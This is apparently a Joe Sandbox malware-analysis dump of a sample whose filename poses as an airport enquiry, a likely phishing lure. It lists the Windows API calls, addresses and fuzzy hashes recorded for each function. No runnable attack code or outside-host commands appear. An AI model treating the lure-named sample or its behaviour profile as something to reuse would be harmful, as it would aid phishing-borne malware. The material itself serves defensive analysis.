              • Part of subcall function 00C81B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00C82036,?,00000000,?,?,?,?,00C816CB,00000000,?), ref: 00C81B9A
            • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 00C820D3
            • KillTimer.USER32(-00000001,?,?,?,?,00C816CB,00000000,?,?,00C81AE2,?,?), ref: 00C8216E
            • DestroyAcceleratorTable.USER32(00000000), ref: 00CBBEF6
            • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00C816CB,00000000,?,?,00C81AE2,?,?), ref: 00CBBF27
            • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00C816CB,00000000,?,?,00C81AE2,?,?), ref: 00CBBF3E
            • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00C816CB,00000000,?,?,00C81AE2,?,?), ref: 00CBBF5A
            • DeleteObject.GDI32(00000000), ref: 00CBBF6C
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
            • String ID:
            • API String ID: 641708696-0
            • Opcode ID: 86e7416038bce96a956dbc994b1bc486a7fce38b81376a04c69c5aeb534d034c
            • Instruction ID: d9fccf48fa1c0b60be6b913a2017e4f8a916d642deeb0d63f6e639b6e88630cc
            • Opcode Fuzzy Hash: 86e7416038bce96a956dbc994b1bc486a7fce38b81376a04c69c5aeb534d034c
            • Instruction Fuzzy Hash: A6618738100710DFDB35AF55DD4CB6AB7F1FB4231AF208429E4528AAA0C771AD81DFA6
            APIs
              • Part of subcall function 00C825DB: GetWindowLongW.USER32(?,000000EB), ref: 00C825EC
            • GetSysColor.USER32(0000000F), ref: 00C821D3
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: ColorLongWindow
            • String ID:
            • API String ID: 259745315-0
            • Opcode ID: 5daf0324aea8d8b55543e7fc91e05e9761a83d0774cd65fcc94d89385c944896
            • Instruction ID: add69ddb5ef1ff2d7572363d545e9a50f4a3f67eb75804a8c5a40a3a1c0f3587
            • Opcode Fuzzy Hash: 5daf0324aea8d8b55543e7fc91e05e9761a83d0774cd65fcc94d89385c944896
            • Instruction Fuzzy Hash: 91418F31100240ABDB256F28EC8CBB93B65EB46335F244265FD758A2E6C7318D42DB65
            APIs
            • CharLowerBuffW.USER32(?,?,00D0F910), ref: 00CEAB76
            • GetDriveTypeW.KERNEL32(00000061,00D3A620,00000061), ref: 00CEAC40
            • _wcscpy.LIBCMT ref: 00CEAC6A
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: BuffCharDriveLowerType_wcscpy
            • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
            • API String ID: 2820617543-1000479233
            • Opcode ID: 067d64cbd89eef9cfef866056b28f1b72a9bb628e01ea3fe25192b046bb6cc4c
            • Instruction ID: a5822fb9dd8e5109055dd8180d2d35f3db03d7aff93dbedbb5eed86a7dbdf60e
            • Opcode Fuzzy Hash: 067d64cbd89eef9cfef866056b28f1b72a9bb628e01ea3fe25192b046bb6cc4c
            • Instruction Fuzzy Hash: F35191311083419FC714EF15C882AAEB7A5EF85708F64482DF496972A2DB31EE49DB53
            APIs
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: __i64tow__itow__swprintf
            • String ID: %.15g$0x%p$False$True
            • API String ID: 421087845-2263619337
            • Opcode ID: 8fd3e9172cb36414e5909583c541fd8f1bef8388332cb3a8149768ac3cc8717d
            • Instruction ID: 7863b7e2fa11f9b8650672b2955f908b5acf0e12e591043bed0282d5727e499b
            • Opcode Fuzzy Hash: 8fd3e9172cb36414e5909583c541fd8f1bef8388332cb3a8149768ac3cc8717d
            • Instruction Fuzzy Hash: 32412531A04205AFDB24EF79DC42EBAB3E8EB45318F24446EF55DD7281EA719902DB11
            APIs
            • _memset.LIBCMT ref: 00D073D9
            • CreateMenu.USER32 ref: 00D073F4
            • SetMenu.USER32(?,00000000), ref: 00D07403
            • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00D07490
            • IsMenu.USER32(?), ref: 00D074A6
            • CreatePopupMenu.USER32 ref: 00D074B0
            • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00D074DD
            • DrawMenuBar.USER32 ref: 00D074E5
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
            • String ID: 0$F
            • API String ID: 176399719-3044882817
            • Opcode ID: f0fe355cd0573f77632fc65325305535a88c1cf16e79a713335a393fc8b0d7b8
            • Instruction ID: 9c22bca13f4122e2f52c202d0df99e3f0ff29ce10f6a063990974fef5e94a100
            • Opcode Fuzzy Hash: f0fe355cd0573f77632fc65325305535a88c1cf16e79a713335a393fc8b0d7b8
            • Instruction Fuzzy Hash: 59410879A05305EFDB20DF65D888B9ABBB5FF49310F144029F9599B3A0D731E920DB60
            APIs
            • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 00D077CD
            • CreateCompatibleDC.GDI32(00000000), ref: 00D077D4
            • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00D077E7
            • SelectObject.GDI32(00000000,00000000), ref: 00D077EF
            • GetPixel.GDI32(00000000,00000000,00000000), ref: 00D077FA
            • DeleteDC.GDI32(00000000), ref: 00D07803
            • GetWindowLongW.USER32(?,000000EC), ref: 00D0780D
            • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 00D07821
            • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 00D0782D
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
            • String ID: static
            • API String ID: 2559357485-2160076837
            • Opcode ID: 25002eaa57ac198876a762ad9db08b9c93b28b8be70948051a64fac42447fb66
            • Instruction ID: 07a59df0ad29bd47dc16827a523e9208234e167eb2f176002eff8783af0a832f
            • Opcode Fuzzy Hash: 25002eaa57ac198876a762ad9db08b9c93b28b8be70948051a64fac42447fb66
            • Instruction Fuzzy Hash: B9318C31504215ABDF229F64DC08FDA3B69FF49360F244225FA19E62E0C731E821DBB4
            APIs
            • _memset.LIBCMT ref: 00CA707B
              • Part of subcall function 00CA8D68: __getptd_noexit.LIBCMT ref: 00CA8D68
            • __gmtime64_s.LIBCMT ref: 00CA7114
            • __gmtime64_s.LIBCMT ref: 00CA714A
            • __gmtime64_s.LIBCMT ref: 00CA7167
            • __allrem.LIBCMT ref: 00CA71BD
            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00CA71D9
            • __allrem.LIBCMT ref: 00CA71F0
            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00CA720E
            • __allrem.LIBCMT ref: 00CA7225
            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00CA7243
            • __invoke_watson.LIBCMT ref: 00CA72B4
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
            • String ID:
            • API String ID: 384356119-0
            • Opcode ID: 85949ae18b549cd2d12431497598bef6b028e5a4746e3945652a320069ef6a5a
            • Instruction ID: f55233fe1e4b026666f7e2134121a4681693b0adca9c92feef5b9cec31419416
            • Opcode Fuzzy Hash: 85949ae18b549cd2d12431497598bef6b028e5a4746e3945652a320069ef6a5a
            • Instruction Fuzzy Hash: 3171C772A04717ABD7149E79CC41BAAB7A8FF16328F14433AF524E7681E770EE409790
            APIs
            • _memset.LIBCMT ref: 00CE2A31
            • GetMenuItemInfoW.USER32(00D46890,000000FF,00000000,00000030), ref: 00CE2A92
            • SetMenuItemInfoW.USER32(00D46890,00000004,00000000,00000030), ref: 00CE2AC8
            • Sleep.KERNEL32(000001F4), ref: 00CE2ADA
            • GetMenuItemCount.USER32(?), ref: 00CE2B1E
            • GetMenuItemID.USER32(?,00000000), ref: 00CE2B3A
            • GetMenuItemID.USER32(?,-00000001), ref: 00CE2B64
            • GetMenuItemID.USER32(?,?), ref: 00CE2BA9
            • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00CE2BEF
            • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00CE2C03
            • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00CE2C24
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
            • String ID:
            • API String ID: 4176008265-0
            • Opcode ID: 8fb715596b0f0b62256b1af78c595b65aa99f658d82c1d789a382c8384732fdf
            • Instruction ID: 5039f1eb1b30b4167ce483fae196a07f82f4ae0c3327866bd14c59cd023f4e9e
            • Opcode Fuzzy Hash: 8fb715596b0f0b62256b1af78c595b65aa99f658d82c1d789a382c8384732fdf
            • Instruction Fuzzy Hash: 156170B0900389AFEB21CF66CC88FAE7BBDFB41304F240569E85297251D771AE45DB21
            APIs
            • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00D07214
            • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00D07217
            • GetWindowLongW.USER32(?,000000F0), ref: 00D0723B
            • _memset.LIBCMT ref: 00D0724C
            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00D0725E
            • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00D072D6
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: MessageSend$LongWindow_memset
            • String ID:
            • API String ID: 830647256-0
            • Opcode ID: 6e184705c4d5ec5c1e68ef9b892bfa47bfbd505cba3cb57741ffea2d3878d439
            • Instruction ID: aa66f2203c01d5e9692b85cf1ead26e1eb973b8146e6442a33f198806e17997a
            • Opcode Fuzzy Hash: 6e184705c4d5ec5c1e68ef9b892bfa47bfbd505cba3cb57741ffea2d3878d439
            • Instruction Fuzzy Hash: BB612775A04308AFDB20DFA4CC81EEE77B8EB0A714F144159FA19EB2E1D770A945DB60
            APIs
            • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00CD7135
            • SafeArrayAllocData.OLEAUT32(?), ref: 00CD718E
            • VariantInit.OLEAUT32(?), ref: 00CD71A0
            • SafeArrayAccessData.OLEAUT32(?,?), ref: 00CD71C0
            • VariantCopy.OLEAUT32(?,?), ref: 00CD7213
            • SafeArrayUnaccessData.OLEAUT32(?), ref: 00CD7227
            • VariantClear.OLEAUT32(?), ref: 00CD723C
            • SafeArrayDestroyData.OLEAUT32(?), ref: 00CD7249
            • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00CD7252
            • VariantClear.OLEAUT32(?), ref: 00CD7264
            • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00CD726F
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
            • String ID:
            • API String ID: 2706829360-0
            • Opcode ID: 538a783e05fcd4fe566f0462861fad7a3639325db963426cf066b31bbdec39fd
            • Instruction ID: caa18b6b60aaef5a6d7f5b0077c32ba14ca3fc1bc794bfdad158253031dc2968
            • Opcode Fuzzy Hash: 538a783e05fcd4fe566f0462861fad7a3639325db963426cf066b31bbdec39fd
            • Instruction Fuzzy Hash: 2C414335900219DFCB10EFA4D884AAEBBB8FF08354F10816AF955D7761DB34E945CBA0
            APIs
            • WSAStartup.WSOCK32(00000101,?), ref: 00CF5AA6
            • inet_addr.WSOCK32(?,?,?), ref: 00CF5AEB
            • gethostbyname.WSOCK32(?), ref: 00CF5AF7
            • IcmpCreateFile.IPHLPAPI ref: 00CF5B05
            • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00CF5B75
            • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00CF5B8B
            • IcmpCloseHandle.IPHLPAPI(00000000), ref: 00CF5C00
            • WSACleanup.WSOCK32 ref: 00CF5C06
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
            • String ID: Ping
            • API String ID: 1028309954-2246546115
            • Opcode ID: 60eab2809c273ffbc5463b926f6cbb0f20efb1c595c4ddc23b9d41d374a67f49
            • Instruction ID: 801832de487b6b7e8520502175d9823bced698fe17ab5599c2c8b812d8903baf
            • Opcode Fuzzy Hash: 60eab2809c273ffbc5463b926f6cbb0f20efb1c595c4ddc23b9d41d374a67f49
            • Instruction Fuzzy Hash: 80518F316047009FD760AF25CC89B3AB7E4EF48710F14892AF76ADB2A1DB70E900DB56
            APIs
            • SetErrorMode.KERNEL32(00000001), ref: 00CEB73B
            • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00CEB7B1
            • GetLastError.KERNEL32 ref: 00CEB7BB
            • SetErrorMode.KERNEL32(00000000,READY), ref: 00CEB828
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: Error$Mode$DiskFreeLastSpace
            • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
            • API String ID: 4194297153-14809454
            • Opcode ID: 480b93f2bfb130b3ad76bda1107841cd07867c267056064209cd227c5c2751f2
            • Instruction ID: 785018cb0af77d8e55e9c103358d15c582b9729de0cac0e0512e885297fafb56
            • Opcode Fuzzy Hash: 480b93f2bfb130b3ad76bda1107841cd07867c267056064209cd227c5c2751f2
            • Instruction Fuzzy Hash: 5131E135A002089FDB10EF6AC885ABF7BB8EF48700F144029F516D7291DB71AE42DBA1
            APIs
              • Part of subcall function 00C87F41: _memmove.LIBCMT ref: 00C87F82
              • Part of subcall function 00CDB0C4: GetClassNameW.USER32(?,?,000000FF), ref: 00CDB0E7
            • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00CD94F6
            • GetDlgCtrlID.USER32 ref: 00CD9501
            • GetParent.USER32 ref: 00CD951D
            • SendMessageW.USER32(00000000,?,00000111,?), ref: 00CD9520
            • GetDlgCtrlID.USER32(?), ref: 00CD9529
            • GetParent.USER32(?), ref: 00CD9545
            • SendMessageW.USER32(00000000,?,?,00000111), ref: 00CD9548
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: MessageSend$CtrlParent$ClassName_memmove
            • String ID: ComboBox$ListBox
            • API String ID: 1536045017-1403004172
            • Opcode ID: cbd35954a42cf9db0bc0ec87076dd739f81c90f1e82c80a350c3712990e9f281
            • Instruction ID: d449af66f906090149e9320f0e11d0c36eccf8b9f4f6934f2b7c1a502c88ce20
            • Opcode Fuzzy Hash: cbd35954a42cf9db0bc0ec87076dd739f81c90f1e82c80a350c3712990e9f281
            • Instruction Fuzzy Hash: 6921C474900204BBCF05AFA5CC85EFEBB74EF45310F604226B661973E2DB759919EB20
            APIs
              • Part of subcall function 00C87F41: _memmove.LIBCMT ref: 00C87F82
              • Part of subcall function 00CDB0C4: GetClassNameW.USER32(?,?,000000FF), ref: 00CDB0E7
            • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 00CD95DF
            • GetDlgCtrlID.USER32 ref: 00CD95EA
            • GetParent.USER32 ref: 00CD9606
            • SendMessageW.USER32(00000000,?,00000111,?), ref: 00CD9609
            • GetDlgCtrlID.USER32(?), ref: 00CD9612
            • GetParent.USER32(?), ref: 00CD962E
            • SendMessageW.USER32(00000000,?,?,00000111), ref: 00CD9631
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: MessageSend$CtrlParent$ClassName_memmove
            • String ID: ComboBox$ListBox
            • API String ID: 1536045017-1403004172
            • Opcode ID: 33df11be0907cf81a8a4100cec5127f218684bc0284939d516771ef992f1d54e
            • Instruction ID: 63a3ef4672ef55410f3af88995453dde589e47157503e8f8c65fe54b485782d4
            • Opcode Fuzzy Hash: 33df11be0907cf81a8a4100cec5127f218684bc0284939d516771ef992f1d54e
            • Instruction Fuzzy Hash: 7B21C874900204BBDF15AB61CCC5EFEBB74EF44300F500116F621973A1DB75991AEB20
            APIs
            • GetParent.USER32 ref: 00CD9651
            • GetClassNameW.USER32(00000000,?,00000100), ref: 00CD9666
            • _wcscmp.LIBCMT ref: 00CD9678
            • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00CD96F3
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: ClassMessageNameParentSend_wcscmp
            • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
            • API String ID: 1704125052-3381328864
            • Opcode ID: a6c20717d5bc78fc386e122f1d9f4223979f35c969561387d654d28c1d93f4e6
            • Instruction ID: c287b0d07618a7164503a9dac3c7658ea0b6ae08c2ab92787ce26aa77470a467
            • Opcode Fuzzy Hash: a6c20717d5bc78fc386e122f1d9f4223979f35c969561387d654d28c1d93f4e6
            • Instruction Fuzzy Hash: 6C113A7B248343BAF6112621DC27DA6B79CCB01324F200127FB10E51E1FEB2EA425A68
            APIs
            • VariantInit.OLEAUT32(?), ref: 00CF8BEC
            • CoInitialize.OLE32(00000000), ref: 00CF8C19
            • CoUninitialize.OLE32 ref: 00CF8C23
            • GetRunningObjectTable.OLE32(00000000,?), ref: 00CF8D23
            • SetErrorMode.KERNEL32(00000001,00000029), ref: 00CF8E50
            • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,00D12C0C), ref: 00CF8E84
            • CoGetObject.OLE32(?,00000000,00D12C0C,?), ref: 00CF8EA7
            • SetErrorMode.KERNEL32(00000000), ref: 00CF8EBA
            • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00CF8F3A
            • VariantClear.OLEAUT32(?), ref: 00CF8F4A
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
